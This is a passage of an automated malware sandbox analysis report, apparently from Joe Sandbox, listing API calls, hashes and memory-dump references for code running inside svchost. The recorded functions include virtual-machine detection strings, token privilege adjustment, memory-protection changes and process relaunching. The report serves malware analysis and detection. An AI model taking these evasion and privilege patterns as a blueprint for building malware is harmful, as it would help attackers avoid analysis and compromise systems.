Part of subcall function 02533555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 02533585
Part of subcall function 02533555: GetLastError.KERNEL32 ref: 0253358B
Part of subcall function 02533555: GetProcessHeap.KERNEL32(00000008,00000001), ref: 025335A1
Part of subcall function 02533555: RtlAllocateHeap.NTDLL(00000000), ref: 025335A8
Part of subcall function 02533555: GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 025335C1
Part of subcall function 02533555: GetSidSubAuthority.ADVAPI32(00000000,00000000), ref: 025335CF
Part of subcall function 02533555: FindCloseChangeNotification.KERNELBASE(00000000), ref: 025335F0
Part of subcall function 02533555: GetProcessHeap.KERNEL32(00000000,00000000), ref: 025335FD
Part of subcall function 02533555: HeapFree.KERNEL32(00000000), ref: 02533604

ExitProcess.KERNEL32 ref: 025326E6

Part of subcall function 025325E3: lstrcpyW.KERNEL32(?,02537328), ref: 025325F6
Part of subcall function 025325E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02532612
Part of subcall function 025325E3: CreateEventW.KERNEL32(00000000,00000000,00000000,?), ref: 02532623
Part of subcall function 025325E3: GetLastError.KERNEL32 ref: 0253262D

Part of subcall function 02532C33: StrStrIW.KERNELBASE(025363B4,?), ref: 02532C67

Part of subcall function 02531BB9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02531BFF
Part of subcall function 02531BB9: HeapFree.KERNEL32(00000000), ref: 02531C06

Part of subcall function 02531FE9: CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02531FF0
Part of subcall function 02531FE9: CreateThread.KERNELBASE(00000000,00000000,Function_00001482,00000000,00000000,00000000), ref: 02532009
Part of subcall function 02531FE9: FindCloseChangeNotification.KERNELBASE(00000000), ref: 02532014

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Create$ErrorEventToken$ChangeCloseFindFreeInformationLastNotificationlstrcpy$AllocateAuthorityExceptionExitFilterModeOpenThreadUnhandledVersionlstrcatmemset
String ID:
API String ID: 179549865-0
Opcode ID: cbdec3907e9d486104d7bf52591357bcdadf2613dacb9fc49768eb506e097214
Instruction ID: 39fbeb043b05d0beadf040d6e0ede4144c8afdc52f614d4ad7d8ac0e41e33163
Opcode Fuzzy Hash: cbdec3907e9d486104d7bf52591357bcdadf2613dacb9fc49768eb506e097214
Instruction Fuzzy Hash: 8DF039B2A80F436AEB033BF9DD0571D275A7FC4306F04B860AD4ACA295DE249C645D7E

Uniqueness

Uniqueness Score: -1.00%

Function 025329F5 Relevance: 3.1, APIs: 2, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68775291d475d68271701eb32eeba07b9a4f9c171a78141224c09a1e9f49a042
Instruction ID: e972654e229c632955f59a8b08f60abc068a4334f355a54a1a1cbfc98cb23c5b
Opcode Fuzzy Hash: 68775291d475d68271701eb32eeba07b9a4f9c171a78141224c09a1e9f49a042
Instruction Fuzzy Hash: 4A51AD71A04342AFE315CF64D8A0EA677E8FF88314F05686DF846CB250E770E908CB69

Uniqueness

Uniqueness Score: -1.00%

Function 025354AC Relevance: 3.1, APIs: 2, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000,00000000,00000000,?), ref: 025354C0
CreateDirectoryW.KERNELBASE(00000000,025362B8), ref: 02535500

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: 0ee1c4d5b71d459a90c79b8f21f4af9710d100b9fbe96bdfc6b8f8e729064905
Instruction ID: 36e881f419b87bbe9112b0e8f94d90df92eb4009917180cf9cd7774317adc051
Opcode Fuzzy Hash: 0ee1c4d5b71d459a90c79b8f21f4af9710d100b9fbe96bdfc6b8f8e729064905
Instruction Fuzzy Hash: 7111B9B6D002187EF701A6A19C45DFF7BFCEF89A60F10105BF904D7140E62899069BB9

Uniqueness

Uniqueness Score: -1.00%

Function 025355BC Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?), ref: 025355D3
CreateDirectoryW.KERNELBASE(?,025362B8), ref: 0253561C

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: CreateDirectoryFolderPath
String ID:
API String ID: 3690537876-0
Opcode ID: a2c6cd69f21bb9ca107461a4e6dbe354ab507bed6cc1ab471609dbbc28a23d18
Instruction ID: f7dbedf02f84f0a0f4bda00b182ff196c7900ba61eac34b6bdd86604231b0d7e
Opcode Fuzzy Hash: a2c6cd69f21bb9ca107461a4e6dbe354ab507bed6cc1ab471609dbbc28a23d18
Instruction Fuzzy Hash: AD019BB3D4011C3EF6116665EC85DBFBBACFB89A14B10101AF905D2140ED246D049AB9

Uniqueness

Uniqueness Score: -1.00%

Function 02531BB9 Relevance: 2.5, APIs: 2, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02531BFF
HeapFree.KERNEL32(00000000), ref: 02531C06

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 9a8836fd9b5a7be525c1c3210c7a30e669dcafc77dc5c96507f084117d38927a
Instruction ID: 278c419e2d63648921aff2dfb59d450d9074474270df13708e5c5ce251b7dd54
Opcode Fuzzy Hash: 9a8836fd9b5a7be525c1c3210c7a30e669dcafc77dc5c96507f084117d38927a
Instruction Fuzzy Hash: 0EF03076D4010CBBDF01EAF4CD05B9DB77CAB08305F005591FA14E6280E6719714ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 02533641 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,0000011C,?,?,?,?,?,?,?,?,02532790), ref: 02533659

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 08eb5832b6675c664640d0706dee63389b4643b54b956308fd047d557d82070d
Instruction ID: 8247ff81ad5b902598ebb2fd391cdc42136d65c32de73ba401392975a01f1e98
Opcode Fuzzy Hash: 08eb5832b6675c664640d0706dee63389b4643b54b956308fd047d557d82070d
Instruction Fuzzy Hash: 7ED0C233A1421C66CB00AAB9A9099CBF7FC9B8C610F0049A6E501E7140E871999446E0

Uniqueness

Uniqueness Score: -1.00%

Function 025329AE Relevance: 1.3, APIs: 1, Instructions: 22sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 02532BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000040,?), ref: 02532BDA
Part of subcall function 02532BA4: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?), ref: 02532C23

Sleep.KERNELBASE(000000FF), ref: 025329E9

Part of subcall function 02532674: SetErrorMode.KERNELBASE(00008007), ref: 02532679

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual$ErrorModeSleep
String ID:
API String ID: 46048798-0
Opcode ID: e1f0c10d8f45ef21a1c19db3157ab9149f84c61f7d538ce0528be9e03e4571bc
Instruction ID: 1218a062a96491286880a8f10b2e50ca6d6aa4953af312b55fe4766f459b3bea
Opcode Fuzzy Hash: e1f0c10d8f45ef21a1c19db3157ab9149f84c61f7d538ce0528be9e03e4571bc
Instruction Fuzzy Hash: 03E01A33D149129FCA52AB68D858BD537A47F48721F062A61AD21CF294D7208CD0DBAC

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02533E7E Relevance: 12.1, APIs: 8, Instructions: 70encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,025373C8,00000001,F0000000,00000094,?), ref: 02533EA1
CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,00000001), ref: 02533EBE
CryptHashData.ADVAPI32(?,?,00000000,00000000), ref: 02533ED4
CryptImportKey.ADVAPI32(?,00000000,00000094,00000000,00000000,?), ref: 02533EF1
CryptVerifySignatureA.ADVAPI32(?,00000000,00000080,00000000,00000000,00000000), ref: 02533F0D
CryptDestroyKey.ADVAPI32(?), ref: 02533F18
CryptDestroyHash.ADVAPI32(?), ref: 02533F26
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02533F30

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextDestroy$AcquireCreateDataImportReleaseSignatureVerify
String ID:
API String ID: 972346567-0
Opcode ID: 2f329bad1ee4a5be4c4c68e73912e53c6625b562777f04ac5287f7b5e79deb07
Instruction ID: 26f1cc2e7414b58d15d28962dbf55bdfb9e263af7b83c80e458eb5047f882709
Opcode Fuzzy Hash: 2f329bad1ee4a5be4c4c68e73912e53c6625b562777f04ac5287f7b5e79deb07
Instruction Fuzzy Hash: 66210876D40258FBCB229F95DD08EAEFF79FB88B11F005595F900A2260C7358A24EF94

Uniqueness

Uniqueness Score: -1.00%

Function 02532F1A Relevance: 10.6, APIs: 7, Instructions: 71encryptionCOMMON

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32(02537658,00000000,00000000,00000001,F0000000,025362B0,?,?,?,02535B88,?,00000000,?,?,02537658,?), ref: 02532F35
CryptCreateHash.ADVAPI32(02537658,00008003,00000000,00000000,?,00000000,?,?,?,02535B88,?,00000000,?,?,02537658,?), ref: 02532F52
CryptHashData.ADVAPI32(?,02537658,?,00000000,?,?,?,02535B88,?,00000000,?,?,02537658,?), ref: 02532F68
CryptHashData.ADVAPI32(?,?,00000004,00000000,?,?,?,02535B88,?,00000000,?,?,02537658,?), ref: 02532F83
CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,?,02535B88,?,00000000,?), ref: 02532FA3
CryptDestroyHash.ADVAPI32(?,?,?,?,02535B88,?,00000000,?,?,02537658,?), ref: 02532FB3
CryptReleaseContext.ADVAPI32(02537658,00000000,?,?,?,02535B88,?,00000000,?,?,02537658,?), ref: 02532FC2

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Crypt$Hash$ContextData$AcquireCreateDestroyParamRelease
String ID:
API String ID: 276068997-0
Opcode ID: 7c23bdee491fbe2719b35e7e1536b7b756ee6d9927a7206486a36f8c6e91b211
Instruction ID: 71394e7a78dbf77c8da308334aa3115819779adf7e245952a94aa76456077dbc
Opcode Fuzzy Hash: 7c23bdee491fbe2719b35e7e1536b7b756ee6d9927a7206486a36f8c6e91b211
Instruction Fuzzy Hash: DB2127B2C40219FFDB128E90DD85AAEBB6CFB08255F0055A5BE04E2250D7318E24AEA4

Uniqueness

Uniqueness Score: -1.00%

Function 0253205E Relevance: 8.8, Strings: 7, Instructions: 80COMMON

Download Yara Rule

Strings

VMwa, xrefs: 025320D9
XenV, xrefs: 025320E8
VBox, xrefs: 02532124
lrp, xrefs: 02532115
KVMK, xrefs: 02532106
Micr, xrefs: 025320F7
f<v, xrefs: 02532077

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID: lrp$KVMK$Micr$VBox$VMwa$XenV$f<v
API String ID: 0-1246326631
Opcode ID: b60f6bd47091b8090b58a2d9336448143bdd06d2adcfb53071f3932aa405f086
Instruction ID: d8ef3154b5a56e6374863c671398b166815bf2963efc5479f75dad172f3ef96d
Opcode Fuzzy Hash: b60f6bd47091b8090b58a2d9336448143bdd06d2adcfb53071f3932aa405f086
Instruction Fuzzy Hash: D421C13090C6815EDB228E2C86516BEBFD47A86210F94E82EEDD9C7202D330DD4DDB57

Uniqueness

Uniqueness Score: -1.00%

Function 025339E8 Relevance: 7.5, APIs: 5, Instructions: 41COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?,?,02531210,?,025371F0,?), ref: 025339F4
OpenProcessToken.ADVAPI32(00000000,?,02531210,?,025371F0,?), ref: 025339FB
LookupPrivilegeValueA.ADVAPI32(00000000,025371F0,02531210), ref: 02533A11
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 02533A36
CloseHandle.KERNEL32(?,?,?,?,02531210,?,025371F0,?), ref: 02533A41

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
String ID:
API String ID: 3038321057-0
Opcode ID: 3544e545481d6e0023a684afa3cb2a78dcc1960c224e7faed3d35c9e494f7685
Instruction ID: f85664101f380413f3828b71866f9d7decfa5f939592c65d9a05868103de0eaf
Opcode Fuzzy Hash: 3544e545481d6e0023a684afa3cb2a78dcc1960c224e7faed3d35c9e494f7685
Instruction Fuzzy Hash: 3DF019B6D00118BBDB219E95DD0CEBFBFFCEB89B10F000595F805E2200D7308A18EAA5

Uniqueness

Uniqueness Score: -1.00%

Function 02533923 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72processCOMMON

Download Yara Rule

APIs

WTSGetActiveConsoleSessionId.KERNEL32 ref: 0253392F
memset.MSVCRT ref: 02533983
CreateProcessAsUserW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000400,00000044,00000000,?,?), ref: 025339B3

Strings

D, xrefs: 0253398B

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: ActiveConsoleCreateProcessSessionUsermemset
String ID: D
API String ID: 108488881-2746444292
Opcode ID: 17585717de3994f459d2194fa9bcbc5eee74d700ebfee37e0b0e26c8431f7f69
Instruction ID: d858177fb20c9ff98ff21d6361c1b6c383c258de9e07414bbb42f98009785268
Opcode Fuzzy Hash: 17585717de3994f459d2194fa9bcbc5eee74d700ebfee37e0b0e26c8431f7f69
Instruction Fuzzy Hash: C0118173C04219BBC711AF21DC04D6BBFACFB897A4F021A19FD5593250D73299189FA6

Uniqueness

Uniqueness Score: -1.00%

Function 02532973 Relevance: 4.5, APIs: 3, Instructions: 14stringCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(025362F2,025363B4), ref: 0253298C
lstrcatW.KERNEL32(025362F0,02537338), ref: 0253299C
SetUnhandledExceptionFilter.KERNEL32(Function_000017E8), ref: 025329A7

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandledlstrcatlstrcpy
String ID:
API String ID: 525088598-0
Opcode ID: 7f1db1a645406c0243e64eed17c72cb8bd6b4fd14611f731ef86fc3ab2bd105d
Instruction ID: cd091ec61cbe377b5583972fc93c954476ef7581a04983bc4964a59a89bd0459
Opcode Fuzzy Hash: 7f1db1a645406c0243e64eed17c72cb8bd6b4fd14611f731ef86fc3ab2bd105d
Instruction Fuzzy Hash: 7ED05EB1EC0202BBF6014FD8EC0AA607368FB08B01B017818B103CF200C2704464AB3D

Uniqueness

Uniqueness Score: -1.00%

Function 02534794 Relevance: 15.1, APIs: 10, Instructions: 143filesleepsynchronizationCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000064), ref: 02534830
CreateEventW.KERNEL32(025362B8,00000000,00000000,?), ref: 02534852
CreateFileMappingW.KERNEL32(000000FF,025362B8,00000004,00000000,00000000,?), ref: 02534886
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 0253489D
SetEvent.KERNEL32(00000000), ref: 025348D9
WaitForSingleObject.KERNEL32(?,00000BB8), ref: 025348EC
UnmapViewOfFile.KERNEL32(00000000), ref: 025348F3
CloseHandle.KERNEL32(?), ref: 02534903
CloseHandle.KERNEL32(?), ref: 02534910
CloseHandle.KERNEL32(00000000), ref: 02534917

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateEventView$MappingObjectSingleSleepUnmapWait
String ID:
API String ID: 3151294157-0
Opcode ID: 3b86c03e12219f865bf80973f28583ab14f61a5ac50f71f287b823c80f43f4eb
Instruction ID: b06ac3d668c4d5b0c7f7d5def8508304d7fc5b186f058e06a6d741223e2be311
Opcode Fuzzy Hash: 3b86c03e12219f865bf80973f28583ab14f61a5ac50f71f287b823c80f43f4eb
Instruction Fuzzy Hash: EE41E776544385AFD3229F549844BB7BFA8FF89760F00181DF588C6281DB70C409CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 02531CD5 Relevance: 12.1, APIs: 8, Instructions: 115memorysleepstringCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,-0000007F,00000001), ref: 02531CFD
RtlAllocateHeap.NTDLL(00000000), ref: 02531D04

Part of subcall function 02531F07: wsprintfA.USER32 ref: 02531F49

lstrcpy.KERNEL32(00000000,00000000), ref: 02531D2D
GetProcessHeap.KERNEL32(00000000,?), ref: 02531DF6
HeapFree.KERNEL32(00000000), ref: 02531DFD
Sleep.KERNEL32(00001388), ref: 02531E08
GetProcessHeap.KERNEL32(00000000,00000000), ref: 02531E1A
HeapFree.KERNEL32(00000000), ref: 02531E21

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateSleeplstrcpywsprintf
String ID:
API String ID: 4213899483-0
Opcode ID: 727ee683ea7fb62c466c3fbf5b74d35f45fb325aa4f45af8fe512e545b6ae959
Instruction ID: 6648ac65dd2998012785a6ee398caeab42bb25d1f69e454a3cdb14904930e1d7
Opcode Fuzzy Hash: 727ee683ea7fb62c466c3fbf5b74d35f45fb325aa4f45af8fe512e545b6ae959
Instruction Fuzzy Hash: 344189B28047019FD7219F79D848A1BBBE8FF88314F009D2EF599C6250D771D618CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 02531E38 Relevance: 12.1, APIs: 8, Instructions: 81memorystringthreadCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,?,02531148,00000009,00000000,025371E0,00000007), ref: 02531E47
GetProcessHeap.KERNEL32(00000008,-0000000B,?,?,?,?,02531148,00000009,00000000,025371E0,00000007), ref: 02531E67
RtlAllocateHeap.NTDLL(00000000), ref: 02531E6E
lstrcpy.KERNEL32(0000000C,00000000), ref: 02531E97
CreateThread.KERNEL32(00000000,00000000,02531F56,00000000,00000000,00000000), ref: 02531EDB
CloseHandle.KERNEL32(00000000,?,?,?,?,02531148,00000009,00000000,025371E0,00000007), ref: 02531EE6
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,02531148,00000009,00000000,025371E0,00000007), ref: 02531EF3
HeapFree.KERNEL32(00000000,?,?,?,?,02531148,00000009,00000000,025371E0,00000007), ref: 02531EFA

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateCloseCreateFreeHandleThreadlstrcpylstrlen
String ID:
API String ID: 3086719409-0
Opcode ID: 14ddc95981ec8915a916ada71f2ed824356e7e97d7a6ce8c12a51e243faa4b57
Instruction ID: 2e5436644343dfba4781b0d8cd0d8bb94a60dc20b01ced4c87fcc25b56a98714
Opcode Fuzzy Hash: 14ddc95981ec8915a916ada71f2ed824356e7e97d7a6ce8c12a51e243faa4b57
Instruction Fuzzy Hash: 3321A172904B46AFD7128F75CC88A67BFECFF09358B04D918E959C6204D771E818DB68

Uniqueness

Uniqueness Score: -1.00%

Function 0253598A Relevance: 10.6, APIs: 7, Instructions: 100memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 025359D3
GetProcessHeap.KERNEL32(00000008,00000000), ref: 025359E8
RtlAllocateHeap.NTDLL(00000000), ref: 025359EF
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,-00000001,?), ref: 02535A09
GetProcessHeap.KERNEL32(00000000,?), ref: 02535A1E
HeapFree.KERNEL32(00000000), ref: 02535A25
RegCloseKey.ADVAPI32(00000000), ref: 02535A2C

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$ProcessQueryValue$AllocateCloseFree
String ID:
API String ID: 1930173803-0
Opcode ID: 28079d3eecf4d3a70793369829dd175069ec9d4f57680ee8af30fdc758fd6752
Instruction ID: 84ec725b5ce6e6b078643475c87aca0394012985a162a32e1e4d4168b9757ca6
Opcode Fuzzy Hash: 28079d3eecf4d3a70793369829dd175069ec9d4f57680ee8af30fdc758fd6752
Instruction Fuzzy Hash: E531D472644201AFE7229F64CC44B7BBBECFB4D616F446818FA85C7340E774D805DA69

Uniqueness

Uniqueness Score: -1.00%

Function 025315D5 Relevance: 10.6, APIs: 7, Instructions: 75memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 025315E4
GetProcessHeap.KERNEL32(00000008,-00000103), ref: 025315FA
RtlAllocateHeap.NTDLL(00000000), ref: 02531601

Part of subcall function 025356E6: GetTempPathA.KERNEL32(00000104,?), ref: 025356F7

Part of subcall function 02532E5A: CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02532E75

GetProcessHeap.KERNEL32(00000000,00000000), ref: 02531669
HeapFree.KERNEL32(00000000), ref: 02531670
GetProcessHeap.KERNEL32(00000000,?), ref: 02531683
HeapFree.KERNEL32(00000000), ref: 0253168A

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$AllocateCreateFilePathTemplstrlen
String ID:
API String ID: 953720001-0
Opcode ID: d3d69c4d76123a941b5f8c00bcbd119bbd12b193c27969db70e70e6933eb5d71
Instruction ID: 493b8170f9211b9bf69149c9de32dc249c9c2eaea4e10d49c47ea8802a9ab056
Opcode Fuzzy Hash: d3d69c4d76123a941b5f8c00bcbd119bbd12b193c27969db70e70e6933eb5d71
Instruction Fuzzy Hash: CE11CDB3C40205BBE7025FB09C49F7ABBACFB4E715F08A819FA4986140CB7594149B7D

Uniqueness

Uniqueness Score: -1.00%

Function 02534E55 Relevance: 10.6, APIs: 7, Instructions: 62memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000002,00000000,?,?,025349A2,00000000,00000000,?,00000000,00000000,025370E8), ref: 02534E70
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 02534E77
CreateThread.KERNEL32(00000000,00000000,02534F6B,00000000,00000000,00000000), ref: 02534EAA
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,025370E8), ref: 02534EB6
HeapFree.KERNEL32(00000000,?,00000000,00000000,025370E8), ref: 02534EBD
CloseHandle.KERNEL32(00000000,00000000,?,?,025349A2,00000000,00000000,?,00000000,00000000,025370E8), ref: 02534ECD
CloseHandle.KERNEL32(00000000,?,00000000,00000000,025370E8), ref: 02534EDF

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$CloseHandleProcess$AllocateCreateFreeThread
String ID:
API String ID: 1729137577-0
Opcode ID: 4e44608b9c218c7563bee20efd5308e0492c1a84d0fa100aba5f390d639db856
Instruction ID: 6d008a7d26de7738c10ee5cd318e88b3c9b978e842ac343f6bc728284bd76ce9
Opcode Fuzzy Hash: 4e44608b9c218c7563bee20efd5308e0492c1a84d0fa100aba5f390d639db856
Instruction Fuzzy Hash: B611E572E453226BD7224E745C4CB2BAFDDBF4AA11F055914F941DA288C7748804A6A9

Uniqueness

Uniqueness Score: -1.00%

Function 025358A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringprocessCOMMON

Download Yara Rule

APIs

Part of subcall function 02532EBA: CreateFileW.KERNELBASE(?,40000000,00000003,00000000,00000002,00000080,00000000,?,?,?,?,02532D76,?,?,?,?), ref: 02532ED5

memset.MSVCRT ref: 025358E2
lstrcpyW.KERNEL32(?,025363B4), ref: 0253590D
lstrcatW.KERNEL32(?,0253764C), ref: 0253591F
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 0253593B
ExitProcess.KERNEL32 ref: 02535946

Strings

D, xrefs: 025358EA

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: CreateProcess$ExitFilelstrcatlstrcpymemset
String ID: D
API String ID: 898148731-2746444292
Opcode ID: 4272a6796744e4d7eaa8ed77208872db5f03e4977c7f4f5153d91836e2aae194
Instruction ID: fbc1999e9ab5d4740cfbcee3e02b484106b49f2e6f97b376f21a4541cef0222f
Opcode Fuzzy Hash: 4272a6796744e4d7eaa8ed77208872db5f03e4977c7f4f5153d91836e2aae194
Instruction Fuzzy Hash: 321133B2D00209BFDB11DFD4DC49FAA7BBCEB88715F005465FA09D6240E6349A28DF68

Uniqueness

Uniqueness Score: -1.00%

Function 02533BE0 Relevance: 9.1, APIs: 6, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 02533BF9
RtlReAllocateHeap.NTDLL(00000000), ref: 02533C4D
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000104,00000000,00000000), ref: 02533CB5
HeapFree.KERNEL32(00000000), ref: 02533CEB
HeapFree.KERNEL32(00000000), ref: 02533D00

Memory Dump Source

Source File: 00000003.00000002.3296387064.0000000002531000.00000020.00000400.00020000.00000000.sdmp, Offset: 02531000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2531000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Free$AllocateByteCharCurrentMultiProcessWide
String ID:
API String ID: 3321845206-0
Opcode ID: 81336bc5e2911944d7ebccb6a07f276da178c19b1fc8225c906a4321da1a5891
Instruction ID: d412641fd7739e8f4f7b4d2e5f4d71986621d55efc3ea519d33624e610d067b0
Opcode Fuzzy Hash: 81336bc5e2911944d7ebccb6a07f276da178c19b1fc8225c906a4321da1a5891
